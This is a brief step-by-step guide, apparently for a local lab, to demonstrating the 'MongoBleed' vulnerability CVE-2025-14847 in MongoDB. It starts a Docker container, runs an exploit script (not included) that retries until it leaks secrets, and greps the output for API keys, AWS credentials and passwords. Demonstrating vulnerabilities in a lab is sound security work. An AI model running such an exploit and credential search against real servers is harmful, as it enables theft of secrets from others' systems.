================================================================================
                    MongoBleed CVE-2025-14847 Demo
================================================================================

STEP 1: Start MongoDB
---------------------
docker compose down -v && docker compose up -d && sleep 10

STEP 2: Run exploit (auto-retries until secrets found)
------------------------------------------------------
python3 mongobleed.py

STEP 3: Show secrets
--------------------
grep -iE "API_KEY|AWS|PASSWORD" leaked.txt

ONE-LINER:
----------
docker compose down -v && docker compose up -d && sleep 10 && python3 mongobleed.py && grep -iE "API_KEY|AWS|PASSWORD" leaked.txt
